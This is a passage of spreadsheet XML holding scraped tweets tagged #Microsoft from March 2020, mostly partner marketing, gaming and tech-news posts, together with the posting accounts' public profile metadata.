'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207556405328150528/auaNoxGi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/350781668/1383838060',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</si>
  <si>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Tue Mar 03 23:44:08 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, ITontology delivers the data, security and AI you need to build an agile data estate. https://t.co/mQk4nAK2Br</t>
  </si>
  <si>
    <t>{'id': 883458175084703744, 'id_str': '883458175084703744', 'name': 'Scott Jerger', 'screen_name': 'ITontology', 'location': 'Dallas, TX', 'description': '', 'url': 'https://t.co/jdyFgZqTKK', 'entities': {'url': {'urls': [{'url': 'https://t.co/jdyFgZqTKK', 'expanded_url': 'http://www.ITontology.com', 'display_url': 'ITontology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Fri Jul 07 22:50:17 +0000 2017', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 200, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1182066536170889216/MKG9JtlE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182066536170889216/MKG9JtlE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/883458175084703744/1543869912',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</si>
  <si>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23:44:07 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/ECReBMPINM</t>
  </si>
  <si>
    <t>Tue Mar 03 23:44:06 +0000 2020</t>
  </si>
  <si>
    <t>How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. #Microsoft #Azure secures your data from exploitation with built-in protections. https://t.co/cumLPdoJbo</t>
  </si>
  <si>
    <t>Tue Mar 03 23:44:05 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, PHI Technologies Corp reduces your risk. https://t.co/kyB1jQpPTK</t>
  </si>
  <si>
    <t>Tue Mar 03 23:44:01 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/zyqetZibDN</t>
  </si>
  <si>
    <t>{'id': 102801468, 'id_str': '102801468', 'name': 'Now Micro', 'screen_name': 'nowmicro', 'location': 'Minnesota', 'description': 'We help organizations better procure, deploy, and manage client computing assets. Find us on https://t.co/IAM8jc9puF or our blog \nhttps://t.co/Q6aFWaeGTH', 'url': 'http://t.co/FoKJmTWKC5', 'entities': {'url': {'urls': [{'url': 'http://t.co/FoKJmTWKC5', 'expanded_url': 'http://www.nowmicro.com', 'display_url': 'nowmicro.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/IAM8jc9puF', 'expanded_url': 'http://Youtube.com/+Nowmicro', 'display_url': 'Youtube.com/+Nowmicro', 'indices': [93, 116]}, {'url': 'https://t.co/Q6aFWaeGTH', 'expanded_url': 'http://www.nowmicro.com/Blog', 'display_url': 'nowmicro.com/Blog', 'indices': [130, 153]}]}}, 'protected': False, 'followers_count': 811, 'friends_count': 423, 'listed_count': 45, 'created_at': 'Thu Jan 07 21:53:06 +0000 2010', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1725, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7FBF1A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/616781175/dot-arrow_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/616781175/dot-arrow_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102801468/1446211944', 'profile_link_color': '1B95E0',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</si>
  <si>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Tue Mar 03 23:43:58 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Now Micro reduces your risk. https://t.co/PgpCpf8GO3</t>
  </si>
  <si>
    <t>Tue Mar 03 23:43:53 +0000 2020</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact N.K. Computer Solutions, LLC for help driving your company's digital transformation. https://t.co/xTIaFBeB7Q</t>
  </si>
  <si>
    <t>{'id': 2861820537, 'id_str': '2861820537', 'name': 'N. K. Computer Solutions', 'screen_name': 'nkcomputersolut', 'location': 'Allen, Texas', 'description': 'We service most major brands of PC and laptops. We come to you! We travel all around the Dallas/Fort Worth Metroplex.', 'url': 'https://t.co/ztucRuWq9L', 'entities': {'url': {'urls': [{'url': 'https://t.co/ztucRuWq9L', 'expanded_url': 'http://nkcomputersolutions.com', 'display_url': 'nkcomputersolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 334, 'listed_count': 1, 'created_at': 'Wed Nov 05 03:26:10 +0000 2014', 'favourites_count': 443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 554,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'http://pbs.twimg.com/profile_images/529841097183203328/fNNqX7Jt_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/529841097183203328/fNNqX7Jt_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2861820537/1415238456',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</si>
  <si>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23:43:48 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/9bAbnD2nOo</t>
  </si>
  <si>
    <t>Tue Mar 03 23:43:27 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure, SitePro harnesses the power of data to drive digital transformation for its oil and gas company customers. https://t.co/ilzthdULyw</t>
  </si>
  <si>
    <t>{'id': 2512099850, 'id_str': '2512099850', 'name': 'Melinda Thompson', 'screen_name': 'WorkingTechMDT', 'location': 'Saint Charles, MO', 'description': 'Founder &amp; CEO, Working Technology LLC', 'url': 'http://t.co/v4JQxQS92Y', 'entities': {'url': {'urls': [{'url': 'http://t.co/v4JQxQS92Y', 'expanded_url': 'http://working-technology.com', 'display_url': 'working-technology.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 111, 'listed_count': 0, 'created_at': 'Wed May 21 09:39:18 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 605,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'http://pbs.twimg.com/profile_images/513231595835113475/HgX_2cXU_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/513231595835113475/HgX_2cXU_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2512099850/1446708326',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</si>
  <si>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23:43:01 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/h3FfIciaBP</t>
  </si>
  <si>
    <t>{'id': 369637008, 'id_str': '369637008', 'name': 'Team Technology', 'screen_name': 'team_technology', 'location': 'Matthews, NC', 'description': 'Microsoft Partner.\nWe service and support Dynamics NAV, Dynamics 365, Office 365, Azure, and more. \nInformation Technology Staffing Solutions.', 'url': 'http://t.co/bDeQFBXRv2', 'entities': {'url': {'urls': [{'url': 'http://t.co/bDeQFBXRv2', 'expanded_url': 'http://www.teamt.com', 'display_url': 'teamt.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 98, 'listed_count': 6, 'created_at': 'Wed Sep 07 17:55:26 +0000 2011', 'favourites_count': 72, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 824,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'http://pbs.twimg.com/profile_images/1055184988931588096/taw1egPF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1055184988931588096/taw1egPF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/369637008/1540407948',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</si>
  <si>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23:42:51 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/M2TKofd8Gl</t>
  </si>
  <si>
    <t>Tue Mar 03 23:42:18 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/8yOdcCZSKO</t>
  </si>
  <si>
    <t>{'id': 1170130330239557637, 'id_str': '1170130330239557637', 'name': 'DevOcean Consulting', 'screen_name': 'DevOceanC', 'location': '', 'description': 'DevOcean is a multi-provider Certified cloud consulting company with the exceptional capabilities of delivering fast and cost effective services.', 'url': 'https://t.co/86CxTpi32w', 'entities': {'url': {'urls': [{'url': 'https://t.co/86CxTpi32w', 'expanded_url': 'http://DevOceanConsulting.com', 'display_url': 'DevOceanConsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Sat Sep 07 00:24:45 +0000 2019', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1186477272427122689/0zhT7u4d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186477272427122689/0zhT7u4d_normal.jpg',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</si>
  <si>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23:41:34 +0000 2020</t>
  </si>
  <si>
    <t>Don't hate on my mix matched socks. Lol #microsoft #DBZKakarot https://t.co/bvnJSOU7Uz</t>
  </si>
  <si>
    <t>{'id': 180922178, 'id_str': '180922178', 'name': 'Brandon Scott', 'screen_name': 'Zardon_Smith', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Fri Aug 20 21:04:58 +0000 2010', 'favourites_count': 24685, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 691,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'http://pbs.twimg.com/profile_images/1009817529475354624/5fYtHz2K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009817529475354624/5fYtHz2K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/180922178/1529594235',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</si>
  <si>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23:40:00 +0000 2020</t>
  </si>
  <si>
    <t>Fashion e-retailer Stitch Fix is the algorithm queen, taking #datascience to new heights. With #Microsoft #PowerBI and #Azure, Stigma Technologies can help you bring powerful #AI insights into your company. https://t.co/wST0F2suBv</t>
  </si>
  <si>
    <t>Tue Mar 03 23:39:01 +0000 2020</t>
  </si>
  <si>
    <t>Cortana reborn: @Microsoft's digital assistant becomes less about Alexa, more a productivity app
https://t.co/jjjaCQxcAr via @CNET #Cortana #microsoft #voiceassistant #technology #technews #apps</t>
  </si>
  <si>
    <t>{'id': 17145442, 'id_str': '17145442', 'name': 'Chris Rauschnot', 'screen_name': '24k', 'location': 'Las Vegas, NV', 'description': 'Top #Influencer PR Newswire Cision DIGIMIND Synthesio. @24kMedia #Video https://t.co/d6JsAOw7yx #Tech #Travel #Auto #Food Blogger HuffPost + &amp; SM Consultant. âœˆï¸', 'url': 'https://t.co/gNEZ2kJp1S', 'entities': {'url': {'urls': [{'url': 'https://t.co/gNEZ2kJp1S', 'expanded_url': 'http://TheMacWizard.com/', 'display_url': 'TheMacWizard.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/d6JsAOw7yx', 'expanded_url': 'http://bit.ly/24klive', 'display_url': 'bit.ly/24klive', 'indices': [72, 95]}]}}, 'protected': False, 'followers_count': 47913, 'friends_count': 35290, 'listed_count': 2213, 'created_at': 'Tue Nov 04 01:09:10 +0000 2008', 'favourites_count': 10768, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 115078, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9AE4E8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/877665732137553921/1ax5DSxj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/877665732137553921/1ax5DSxj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17145442/1432188918', 'profile_link_color': '0000FF',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</si>
  <si>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Tue Mar 03 23:38:51 +0000 2020</t>
  </si>
  <si>
    <t>In this infographic, learn how AI and tools like #Microsoft #BusinessIntelligence can help drive better marketing decisions and guide your business to greater growth. https://t.co/c1uy5qVmmD</t>
  </si>
  <si>
    <t>Tue Mar 03 23:38:21 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/aTPjoPkn3c</t>
  </si>
  <si>
    <t>Tue Mar 03 23:36:36 +0000 2020</t>
  </si>
  <si>
    <t>Lets go boys  Here to kick ass and take names 
Tags (Ignore) 
#apexlegends #battleroyale #season4 #systemoverride #letsgetit #squadup #xboxonex #microsoft #ea #gaming #gamer #apexlegendsxbox... https://t.co/dCNaF6M7oO</t>
  </si>
  <si>
    <t>{'id': 1057610686749200386, 'id_str': '1057610686749200386', 'name': 'PowerToTheBeast', 'screen_name': 'PowerToTheBeas1', 'location': 'Rhode Island, USA', 'description': 'Game until your fingers bleed, and then keep going!! - BeastðŸ¤˜ðŸ»ðŸ¤™ðŸ»ðŸ‡ºðŸ‡¸ Insta/ FB/ YT @ PowerToTheBeast', 'url': 'https://t.co/ZJXAwK3FtY', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZJXAwK3FtY', 'expanded_url': 'https://www.facebook.com/powertothebeast/', 'display_url': 'facebook.com/powertothebeasâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Wed Oct 31 12:30:11 +0000 2018', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 115, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1152983196319002624/pCRTkWex_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152983196319002624/pCRTkWex_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1057610686749200386/1577771185',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</si>
  <si>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23:35:26 +0000 2020</t>
  </si>
  <si>
    <t>When providing public services, #efficiency can make or break the public's trust in your organization. Subscribe now to learn how you can enable trust-building actions with #Microsoft. https://t.co/sfpGsUTcYC</t>
  </si>
  <si>
    <t>{'id': 1006980086636179457, 'id_str': '1006980086636179457', 'name': 'Weston Technology Group', 'screen_name': 'tg_weston', 'location': 'Weston, FL', 'description': 'Weston Technology Group, LLC, is an IT Cloud centric MSP that delivers local services in Florida and remote services in the US.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 83, 'listed_count': 2, 'created_at': 'Wed Jun 13 19:22:16 +0000 2018', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 433,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'http://pbs.twimg.com/profile_images/1007003841500332033/ian2i8Nt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007003841500332033/ian2i8Nt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1006980086636179457/1546724699', 'profile_link_color': '191970',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</si>
  <si>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23:34:25 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/0xPZyRPn6e</t>
  </si>
  <si>
    <t>{'id': 393684963, 'id_str': '393684963', 'name': 'Exigo Biz Solutions', 'screen_name': 'ExigoBiz', 'location': 'Kansas City', 'description': 'We make running a small business simple.', 'url': 'https://t.co/heG2xYFvhz', 'entities': {'url': {'urls': [{'url': 'https://t.co/heG2xYFvhz', 'expanded_url': 'http://www.exigobusiness.com', 'display_url': 'exigobusiness.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 232, 'friends_count': 272, 'listed_count': 13, 'created_at': 'Tue Oct 18 22:34:40 +0000 2011', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3469, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E3AF63', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/732203642787258369/CyRDsrGo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/732203642787258369/CyRDsrGo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/393684963/1533066441', 'profile_link_color': '1A74C0', 'profile_sidebar_border_color': '482931', 'profile_sidebar_fill_color': '781839', 'profile_text_color': 'C72546', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 23:33:43 +0000 2020</t>
  </si>
  <si>
    <t>Winning companies never stop #innovating. See how Michelin uses #Microsoft #Dynamics365 to serve customers in game-changing ways--at home. Talk about #transformation. #fieldservice https://t.co/epNbAayD13</t>
  </si>
  <si>
    <t>Tue Mar 03 23:33:29 +0000 2020</t>
  </si>
  <si>
    <t>Exam AZ-120 - Planning and Administering Microsoft Azure for SAP Workloads
#saponazure #azurecloud #microsoftazure #SAP #microsoft #AZ-120 https://t.co/sU4vDByBeC</t>
  </si>
  <si>
    <t>{'id': 138612493, 'id_str': '138612493', 'name': 'Abraham Vadillo', 'screen_name': 'AbrahamVadillo', 'location': 'Monterrey, Nuevo LeÃ³n, MÃ©xico', 'description': 'Profesional de tecnologÃ­a SAP y editor de mapas de Waze.', 'url': 'http://t.co/BCjCUHQowC', 'entities': {'url': {'urls': [{'url': 'http://t.co/BCjCUHQowC', 'expanded_url': 'http://linkd.in/AVadillo', 'display_url': 'linkd.in/AVadillo', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 263, 'listed_count': 0, 'created_at': 'Fri Apr 30 01:49:32 +0000 2010', 'favourites_count': 1392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 956,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'http://pbs.twimg.com/profile_images/839520184209571840/pWIoUbFd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/839520184209571840/pWIoUbFd_normal.jpg',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</si>
  <si>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23:31:51 +0000 2020</t>
  </si>
  <si>
    <t>Embrace the Darkness !!
#whatsapp #facebook #instagram #darkmode #google #alphabet #ceo #sundarpichai #larrypage #schmidt #apple #timcook #stevejobs #microsoft #billgates #satyanadela #samsung #oneplus #huawei #xiaomi #android 
 https://t.co/FsQPwhsaUN</t>
  </si>
  <si>
    <t>Tue Mar 03 23:30:59 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdnNE1 #microsoft #xbox #xbox360 #gaming #fps https://t.co/MYpbkA8p9D</t>
  </si>
  <si>
    <t>Tue Mar 03 23:30:28 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> How do you become a digital enterprise? Organizations face a choice of building their own #IoT platform or buying a pre-built platform. Read this joint #Microsoft and #Siemens white paper to learn more. #TodayMeetsTomorrow https://t.co/8WCfj0W07d</t>
  </si>
  <si>
    <t>{'id': 1033826290535747584, 'id_str': '1033826290535747584', 'name': 'Jeff Miller', 'screen_name': 'kg6qhd', 'location': 'Texas', 'description': 'Technology geek with more than 35-years in #CAD, #CAM, #PLM and #IOT. Enjoy friends, food, wine, cars, travel and more. The opinions expressed here are my own.', 'url': 'https://t.co/bXyhDNFNGg', 'entities': {'url': {'urls': [{'url': 'https://t.co/bXyhDNFNGg', 'expanded_url': 'https://www.linkedin.com/in/jefferymiller', 'display_url': 'linkedin.com/in/jefferymillâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 416, 'listed_count': 1, 'created_at': 'Sun Aug 26 21:19:30 +0000 2018', 'favourites_count': 367, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 978, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201572418780876800/CvIdTKdi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201572418780876800/CvIdTKdi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1033826290535747584/1535319430',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</si>
  <si>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23:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are giving away enterprise conferencing tools due to coronavirus https://t.co/3iWygDJ4Yj via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 23:25:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels #MVP Summit due to COVID-19 #coronavirus fears https://t.co/fCZih87XFA #SankalpIT</t>
  </si>
  <si>
    <t>Tue Mar 03 23:23:34 +0000 2020</t>
  </si>
  <si>
    <t>Here at Microsoft we moved to #MicrosoftTeams and now our #meetings are simpler. #Teams #Microsoft #Microsoft365 #Office365 https://t.co/f8z4KLy5lI</t>
  </si>
  <si>
    <t>Tue Mar 03 23:22:08 +0000 2020</t>
  </si>
  <si>
    <t>Hey @DanielAndrewsMP
As a teacher in the public system, why are we forced to use second rate tools like #Office365 when we could be using innovative systems like @google #gsuite (and saving money)?
What's with #vicpol's fascination with #Microsoft?</t>
  </si>
  <si>
    <t>{'id': 216507928, 'id_str': '216507928', 'name': 'ðŸ’§Rodd Clarkson', 'screen_name': 'mrmintslice', 'location': 'Victoria, Australia', 'description': "I am me. I rant and rave. For me or don't.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 696, 'friends_count': 1572, 'listed_count': 22, 'created_at': 'Tue Nov 16 22:36:42 +0000 2010', 'favourites_count': 85694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 79081,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'http://pbs.twimg.com/profile_images/1210509452/moosetech_face_64x64_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210509452/moosetech_face_64x64_normal.png',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</si>
  <si>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23:20:51 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> New Podcast! "Episode 52: Xbox, GOG and Candyman" on @Spreaker #bafta #bobiger #candyman #disney #dreams #gog #hiphop #jordanpeele #konami #microsoft #mulan #netflix #nextgen #partynextdoor #ps5 #uncharted #videogamepodcast #videogames #xbox https://t.co/WfdLYlHw3F</t>
  </si>
  <si>
    <t>{'id': 965759445518217216, 'id_str': '965759445518217216', 'name': '808s and Joysticks', 'screen_name': '808sandjoystick', 'location': 'United Kingdom', 'description': 'A #podcast with something for #music, #gaming and #film fanatics alike. Now airing every Thursday at 7pm PST/3am GMT on @dash_radio multiplayer!', 'url': 'https://t.co/GS5JUaMXUA', 'entities': {'url': {'urls': [{'url': 'https://t.co/GS5JUaMXUA', 'expanded_url': 'http://www.808sandjoysticks.com', 'display_url': '808sandjoysticks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2336, 'friends_count': 137, 'listed_count': 10, 'created_at': 'Tue Feb 20 01:26:09 +0000 2018', 'favourites_count': 84, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 949,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'http://pbs.twimg.com/profile_images/1159788142456709121/XRkRgeOT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159788142456709121/XRkRgeOT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/965759445518217216/1565350016',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</si>
  <si>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23:19:31 +0000 2020</t>
  </si>
  <si>
    <t>Dude ran out from that rock like patrick when its jellyfishing time! #SpongeBob #PUBG #Xbox #XboxOne #Mixer #streamer #gamer #microsoft #twitchtv #clips https://t.co/gJ8H5fGNMb</t>
  </si>
  <si>
    <t>{'id': 1158873685660512262, 'id_str': '1158873685660512262', 'name': 'â€œNayChopâ€', 'screen_name': 'MiltSummey', 'location': '', 'description': 'Competitive Gamer restricted to no game! Use code â€œNayChopâ€ for 10% off at https://t.co/1jajggHBss https://t.co/OlVaXF3ttV', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/1jajggHBss', 'expanded_url': 'https://rogueenergy.com', 'display_url': 'rogueenergy.com', 'indices': [75, 98]}, {'url': 'https://t.co/OlVaXF3ttV', 'expanded_url': 'https://mixer.com/NayChop', 'display_url': 'mixer.com/NayChop', 'indices': [99, 122]}]}}, 'protected': False, 'followers_count': 30, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Tue Aug 06 22:53:12 +0000 2019', 'favourites_count': 187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 147, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1158874336066985990/p6nHQ5iQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158874336066985990/p6nHQ5iQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1158873685660512262/1583201489',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</si>
  <si>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23:15:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows10 Start menu that de-emphasizes Live Tiles https://t.co/QB75d45oBT via @Verge</t>
  </si>
  <si>
    <t>Tue Mar 03 23:13:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts Your Phone #App possibly getting Drag and Drop | read: https://t.co/18I6rbJMwO | #DBSMobileApp #Files #Folders #Mobile #Transfer #YourPhone https://t.co/YSY7aPtKq6</t>
  </si>
  <si>
    <t>{'id': 2934851685, 'id_str': '2934851685', 'name': 'Retail News Asia', 'screen_name': 'retailnewsasia', 'location': 'A.S.I.A', 'description': 'Retail Breaking News from Asia. The latest retail news, market research and the latest retail news of today.', 'url': 'https://t.co/gNK3AzC6ia', 'entities': {'url': {'urls': [{'url': 'https://t.co/gNK3AzC6ia', 'expanded_url': 'http://www.retailnews.asia', 'display_url': 'retailnews.asia', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3099, 'friends_count': 164, 'listed_count': 542, 'created_at': 'Sun Dec 21 07:58:24 +0000 2014', 'favourites_count': 754, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25529,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'http://pbs.twimg.com/profile_images/669272480159301632/mHwtIMmg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/669272480159301632/mHwtIMmg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2934851685/1419411890',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</si>
  <si>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23:12:53 +0000 2020</t>
  </si>
  <si>
    <t>Our love of all things @xbox is so strong, we designed a t-shirt to prove it. Click the link in our bio &amp;amp; select t-shirts. Available now!
.
.
#invertedpixels #gameoutloud #gamergear #gamertshirt #xbox #microsoft... https://t.co/fuzyzM3G2r</t>
  </si>
  <si>
